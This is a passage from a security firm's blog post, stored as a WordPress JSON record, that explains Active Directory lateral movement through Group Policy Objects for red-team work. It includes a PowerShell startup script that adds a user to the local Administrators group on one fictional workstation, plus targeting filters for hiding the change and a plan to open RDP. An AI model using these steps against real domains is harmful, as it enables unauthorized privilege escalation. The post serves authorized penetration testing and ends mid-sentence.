{"id":230278,"date":"2025-11-25T13:06:27","date_gmt":"2025-11-25T13:06:27","guid":{"rendered":"https:\/\/www.intrinsec.com\/?p=230278"},"modified":"2025-11-25T13:06:29","modified_gmt":"2025-11-25T13:06:29","slug":"hide-the-threat-gpo-lateral-movement","status":"publish","type":"post","link":"https:\/\/www.intrinsec.com\/en\/hide-the-threat-gpo-lateral-movement\/","title":{"rendered":"Hide the threat \u2013 GPO lateral movement"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\"><strong>Offensive security &#8211; TL;DR :<\/strong> The use of GPO to perform lateral movement has become more common during recent Red Team assessments. One key aspect of this process is the targeting. As a Red Teamer\/Pentester, you don&rsquo;t want to deploy your configuration on a high number of assets without control. Several methods exist : <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">Security filtering<\/mark><\/code>, <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">Item-level targeting<\/mark><\/code> and <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">Script-based targeting<\/mark><\/code>.<\/p>\n\n\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"https:\/\/github.com\/FSecureLABS\/SharpGPOAbuse\">SharpGPOAbuse<\/a><\/li>\n\n\n\n<li><a href=\"https:\/\/github.com\/P-aLu\/SharpGPO\">SharpGPO<\/a> (Fork)<\/li>\n\n\n\n<li><a href=\"https:\/\/github.com\/synacktiv\/GroupPolicyBackdoor\">GroupPolicyBackdoor<\/a><\/li>\n<\/ul>\n\n\n\n<div style=\"height:100px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"introduction\">Introduction<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">While doing internal pentests or <a href=\"https:\/\/www.intrinsec.com\/red-team-cybersecurite\/\">Red Team<\/a> assessments, we often figure how to proceed a stealthy and clean lateral movement.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">While good old techniques still work like a charm on most of the servers, enforced firewall policies are more and more implemented, especially on workstations. This globally means that we can no longer use services such as <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">SMB<\/mark><\/code> (TCP\/445) or <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">RPC<\/mark><\/code> (TCP\/135).<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">This problem can be commonly encountered while trying to reach a specific workstation (hello \u00ab\u00a0VIP emails access\u00a0\u00bb trophy) connected to an enterprise VPN.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">That&rsquo;s where <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">GPOs (Group Policy Objects)<\/mark> come into play.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Basically, GPOs let an administrator deploy settings upon a bunch of AD objects (devices or users). In other words, if we have the adequate privileges, we can deploy settings on the targeted assets. For example, attackers may use this technique to deploy a ransomware.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">During an assessment, we often want to ensure only specific assets will be targeted (except for ransomware simulation exercises).<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Several methods can be used to address this problem. This blog post will dive on 3 them:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Filter during the execution of the attack (<code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">script-based targeting<\/mark><\/code>)<\/li>\n\n\n\n<li>Filter using configuration settings within GPO (<code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">Item-level targeting<\/mark><\/code>)<\/li>\n\n\n\n<li>Filter using the configuration of the GPO itself (<code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">Security Filtering<\/mark><\/code>)<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"initial-context\">Initial context<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Let&rsquo;s say the company <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">Galaxy<\/mark><\/code>, which has a <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">galaxy.lan<\/mark><\/code> on premise Active Directory domain, has been compromised. The <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\"><code>Workstations<\/code><\/mark> OU membership is the following:<\/p>\n\n\n\n<pre class=\"wp-block-sentidoweb-snippet\"><code class=\"markdown\">DC=GALAXY, DC=LAN\n|_ Machines\n    |_ Servers\n        [...]\n    |_ Workstations\n        |_ WinRM\n            GAL-TATOOINE\n        |_ Hard\n            GAL-IOKATH\n            GAL-SHIVA\n            |_ LAPS\n                GAL-CORRUSCANT\n        |_ RT\n            [...]<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Our goal is to add the <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">galaxy.lan\\C3-PO<\/mark><\/code> user to the <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\"><code>Administrators<\/code> <\/mark>localgroup of the <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">GAL-IOKATH<\/mark><\/code> workstation. As previously mentionned, we do not want to apply our GPO to the entire <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\"><code>Machines<\/code> <\/mark>OU, nor to the entire <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\"><code>Workstations<\/code> <\/mark>or <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\"><code>Hard<\/code> <\/mark>OUs.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"understand-how-gpos-work\">Understand how GPOs work<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Basically, a GPO is a folder within the <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\"><code>SYSVOL<\/code> <\/mark>share, which an LDAP entry is associated to. Within this folder, configuration files and\/or scripts are present. When updating a GPO, a user or computer accesses the GPO&rsquo;s folders that are linked to it, read the content, retrieve files and then apply the configurations.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\"><code>GPLink<\/code> <\/mark>objects are defined to link a GPO to an OU or a Container<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">From an <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\"><code>LDAP<\/code> <\/mark>perspective, the user or computer first reads the GPLinks associated to its Organizational Units \/ Containers. It then reads the related GPO LDAP object, which contains the path to the <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\"><code>SYSVOL<\/code> <\/mark>folder.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img fetchpriority=\"high\" decoding=\"async\" width=\"839\" height=\"271\" src=\"https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-15.png\" alt=\"\" class=\"wp-image-230304\" title=\" =419.5x135.5\" srcset=\"https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-15.png 839w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-15-300x97.png 300w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-15-768x248.png 768w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-15-18x6.png 18w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-15-650x210.png 650w\" sizes=\"(max-width: 839px) 100vw, 839px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">To better understand the basics, let&rsquo;s say we did configure the privesc of the <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">C3-PO<\/mark><\/code> user in 2 ways :<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Using the <strong>Local groups<\/strong> configuration<\/li>\n\n\n\n<li>Adding a <strong>script execution<\/strong> configuration at startup<\/li>\n<\/ul>\n\n\n<div class=\"wp-block-image is-style-default\">\n<figure class=\"aligncenter size-full is-resized\"><img decoding=\"async\" width=\"402\" height=\"458\" src=\"https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-16.png\" alt=\"\" class=\"wp-image-230305\" style=\"width:411px;height:auto\" title=\" =201x229\" srcset=\"https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-16.png 402w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-16-263x300.png 263w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-16-11x12.png 11w\" sizes=\"(max-width: 402px) 100vw, 402px\" \/><\/figure>\n<\/div>\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" width=\"818\" height=\"609\" src=\"https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-20.png\" alt=\"\" class=\"wp-image-230311\" title=\" =409x304.5\" srcset=\"https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-20.png 818w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-20-300x223.png 300w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-20-768x572.png 768w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-20-16x12.png 16w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-20-650x484.png 650w\" sizes=\"(max-width: 818px) 100vw, 818px\" \/><\/figure>\n\n\n\n<pre class=\"wp-block-sentidoweb-snippet\"><button class=\"sw-snippet-button\" data-label-copy=\"Copy\" data-label-copied=\"Copied\">Copy<\/button><code class=\"shell\"># revolution.ps1\n$Username = \"C3-PO\"\n$Group = \"Administrators\"\nAdd-LocalGroupMember -Group $Group -Member $Username -ErrorAction Stop<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">If we look inside the GPO folder, we will find the <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">MachinePreferencesGroupsGroups.xml<\/mark><\/code> and <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\"><code>MachineScriptsStartup<\/code> <\/mark>files.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The first file will indicate to the asset getting the GPO that it has to configure the group as described. The second will indicate that the script must be ran at startup.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"scope-issue\">Scope issue<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">We now face our problem, we only want <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">Gal-Iokath<\/mark><\/code> to apply our settings. The fact is that if we link our GPO to the <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">OU=Hard, OU=Workstations, OU=Machines, DC=GALAXY, DC=LAN<\/mark><\/code> organizational unit, <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">GAL-SHIVA<\/mark><\/code> and <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">GAL-CORRUSCANT<\/mark><\/code> will also be impacted.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"in-script-filter\">In-script filter<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">First, we will try to reduce the impact of the GPO by setting a filter within the script we used. Let&rsquo;s add some logs too in order to ensure what&rsquo;s going on.<\/p>\n\n\n\n<pre class=\"wp-block-sentidoweb-snippet\"><button class=\"sw-snippet-button\" data-label-copy=\"Copy\" data-label-copied=\"Copied\">Copy<\/button><code class=\"shell\"># revolution.ps1\n$Username = \"C3-PO\"\n$Group = \"Administrators\"\n$_Host = ([System.Net.Dns]::GetHostByName($env:computerName)).HostName.ToLower()\nif ($_Host -ne \"gal-iokath.galaxy.lan\") {\n        echo \"Wrong target\" > C:WindowsTempGPO_log.txt\n}\nelse {\n        Add-LocalGroupMember -Group $Group -Member $Username -ErrorAction Stop\n        echo \"Target\" > C:WindowsTempGPO_log.txt\n}<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">If we look at the <code>Gal-Iokath<\/code> computer after a restart, we can see that it worked well:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&gt; type C:WindowsTempGPO_log.txt\nTarget<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">While the script ran, it didn&rsquo;t apply the change on the <code>Gal-Corruscant<\/code> computer:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&gt; type C:WindowsTempGPO_log.txt\nWrong target<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Nevertheless, the GPO is still applied on all the computers within the linked OU, we just found a workarund to this by applying a filter within our script.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"987\" height=\"231\" src=\"https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-17.png\" alt=\"\" class=\"wp-image-230306\" title=\" =493.5x115.5\" srcset=\"https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-17.png 987w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-17-300x70.png 300w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-17-768x180.png 768w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-17-18x4.png 18w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-17-650x152.png 650w\" sizes=\"(max-width: 987px) 100vw, 987px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Another negative aspect of this method is that it can not apply to every GPO settings, but only to settings that use a script.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"in-configurations-filters\">In configurations filters<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">We will now use the built-in <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">Item-level targeting<\/mark><\/code> setting. This setting applies directly within the GPO configurations. For example, regarding our Groups modification:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"471\" height=\"528\" src=\"https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-18.png\" alt=\"\" class=\"wp-image-230307\" title=\" =235.5x264\" srcset=\"https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-18.png 471w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-18-268x300.png 268w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-18-11x12.png 11w\" sizes=\"(max-width: 471px) 100vw, 471px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">If we enter the setup menu, we can see there are a lot of options to configure. We can also use logic operators between options. Let&rsquo;s try something:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"681\" height=\"518\" src=\"https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-19.png\" alt=\"\" class=\"wp-image-230308\" title=\" =340.5x259\" srcset=\"https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-19.png 681w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-19-300x228.png 300w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-19-16x12.png 16w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-19-650x494.png 650w\" sizes=\"(max-width: 681px) 100vw, 681px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">If we now take a look at the <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">Groups.xml<\/mark><\/code> file within the <code>SYSVOL<\/code> folder, we can observe a new section called <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">Filters<\/mark><\/code>:<\/p>\n\n\n\n<pre class=\"wp-block-sentidoweb-snippet\"><code class=\"\">&lt;Filters>\n  &lt;FilterComputer bool=\"AND\" not=\"0\" type=\"NETBIOS\" name=\"GAL-IOKATH\"\/>\n  &lt;FilterOs bool=\"AND\" not=\"0\" class=\"NT\" version=\"WINTHRESHOLD\" type=\"NE\" edition=\"NE\" sp=\"NE\"\/>\n  &lt;FilterCollection bool=\"AND\" not=\"0\">\n    &lt;FilterIpRange bool=\"AND\" not=\"0\" useIPv6=\"0\" min=\"10.26.1.0\" max=\"10.26.1.255\"\/>\n    &lt;FilterDomain bool=\"AND\" not=\"0\" name=\"GALAXY\" userContext=\"0\"\/>\n  &lt;\/FilterCollection>\n&lt;\/Filters><\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Let&rsquo;s now look at the report of GPO application on both <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">GAL-IOKATH<\/mark><\/code> and <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">GAL-CORRSUCANT<\/mark><\/code> computers:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"818\" height=\"609\" src=\"https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-20.png\" alt=\"\" class=\"wp-image-230309\" title=\" =489.5x283\" srcset=\"https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-20.png 818w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-20-300x223.png 300w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-20-768x572.png 768w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-20-16x12.png 16w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-20-650x484.png 650w\" sizes=\"(max-width: 818px) 100vw, 818px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">We can see that the <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">GAL-IOKATH<\/mark><\/code> computer applied our GPO while <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">GAL-CORRUSCANT<\/mark><\/code> did not:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"771\" height=\"421\" src=\"https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-21.png\" alt=\"\" class=\"wp-image-230310\" title=\" =385.5x210.5\" srcset=\"https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-21.png 771w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-21-300x164.png 300w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-21-768x419.png 768w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-21-18x10.png 18w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-21-650x355.png 650w\" sizes=\"(max-width: 771px) 100vw, 771px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">The only mention to the <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">GPO Demo<\/mark><\/code> GPO is that the GPO is applied. Indeed, as explained before, the setting is applied to the GPO configuration and not the GPO itself. Thus, some other configurations of the GPO could be set up and applied to the workstation.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"979\" height=\"304\" src=\"https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-22.png\" alt=\"\" class=\"wp-image-230312\" title=\" =489.5x152\" srcset=\"https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-22.png 979w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-22-300x93.png 300w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-22-768x238.png 768w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-22-18x6.png 18w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-22-650x202.png 650w\" sizes=\"(max-width: 979px) 100vw, 979px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Basically, this technique of filtering is really powerful and much safer than the <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">in-script<\/mark><\/code> method, because it relies on Microsoft built-in tools. Moreover, it easily integrates with an already existing GPO.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"security-filtering\">Security filtering<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Essentially, <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">Security filtering<\/mark><\/code> aims to chose which assets are allowed to get a Group Policy. As stated in the Group Policy Editor from Microsoft regarding Security Filtering: <strong>\u00ab\u00a0The settings in this GPO can only apply to the following groups, users, and computers\u00a0\u00bb<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"427\" height=\"95\" src=\"https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-23.png\" alt=\"\" class=\"wp-image-230314\" title=\" =206.5x53\" srcset=\"https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-23.png 427w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-23-300x67.png 300w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-23-18x4.png 18w\" sizes=\"(max-width: 427px) 100vw, 427px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Let&rsquo;s try removing <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">NTAuthenticated Users<\/mark><\/code> default configuration and adding only the target computer <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">GAL-IOKATH$<\/mark><\/code> (groups or users can also be configured):<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"427\" height=\"95\" src=\"https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-23.png\" alt=\"\" class=\"wp-image-230313\" title=\" =213.5x47.5\" srcset=\"https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-23.png 427w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-23-300x67.png 300w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-23-18x4.png 18w\" sizes=\"(max-width: 427px) 100vw, 427px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Let&rsquo;s now pull one more time the GPO on <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">GAL-CORRUSCANT<\/mark><\/code>. This time, our <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">Demo GPO<\/mark><\/code> appears as a <strong>Denied GPO<\/strong>:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"976\" height=\"259\" src=\"https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-24.png\" alt=\"\" class=\"wp-image-230315\" title=\" =488x129.5\" srcset=\"https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-24.png 976w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-24-300x80.png 300w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-24-768x204.png 768w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-24-18x5.png 18w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-24-650x172.png 650w\" sizes=\"(max-width: 976px) 100vw, 976px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">So, this time, the entire <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">Demo GPO<\/mark><\/code> is not applied to the <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">GAL-CORRUSCANT<\/mark><\/code> computer (or any computer except <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">GAL-IOKATH<\/mark><\/code>), regardless of the configurations defined within the GPO.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">This method is less flexible but stronger than the <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">Item-level targeting<\/mark><\/code> filters. Indeed, some configurations won&rsquo;t allow you to set up <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">Item-level targeting<\/mark><\/code> filters such as startup scripts.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"make-it-your-own\">Make it your own<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"manual-configuration---time-is-worth\">Manual configuration &#8211; time is worth<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">In order to configure your GPO manually, we recommend using a test environment. In this blogpost, the <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">logres.lan<\/mark><\/code> on-premise domain will be used.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">This time, our final objective is to set up <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">C3-PO<\/mark><\/code> as a local administrator of the <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">Gal-Iokath<\/mark><\/code> computer and open the <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\"><code>RDP<\/code> <\/mark>port within local firewall.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">First, we will create a new GPO on our test environnement and set up the configurations we want. While the <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">C3-PO<\/mark><\/code> user doesn&rsquo;t exist in the <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">logres.lan<\/mark><\/code> environnement, we are going to put a temporary user.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Doing the modifications manually first means that you can explore a large variety of configurations within Group Policy.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"791\" height=\"580\" src=\"https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-25.png\" alt=\"\" class=\"wp-image-230316\" title=\" =395.5x290\" srcset=\"https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-25.png 791w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-25-300x220.png 300w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-25-768x563.png 768w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-25-16x12.png 16w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-25-650x477.png 650w\" sizes=\"(max-width: 791px) 100vw, 791px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"732\" height=\"422\" src=\"https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-27.png\" alt=\"\" class=\"wp-image-230318\" title=\" =366x211\" srcset=\"https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-27.png 732w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-27-300x173.png 300w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-27-18x10.png 18w, https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/image-27-650x375.png 650w\" sizes=\"(max-width: 732px) 100vw, 732px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">This is the time we need to think about how we will filter the GPO. While Firewall rules settings don&rsquo;t let us configure <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">Item-level filtering<\/mark><\/code>, we will have to use the <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">Security filtering<\/mark><\/code>.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Let&rsquo;s now check the <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\"><code>SYSVOL<\/code> <\/mark>folder:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Machine\n|_ Applications\n|_ Microsoft\n    |_ Windows NT\n        |_ SecEdit\n            |_ GptTmpl.inf\n|_ Preferences\n    |_ Groups\n        |_ Groups.xml\n|_ Scripts\n|_ Registry.pol<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><code><mark style=\"background-color:rgba(0, 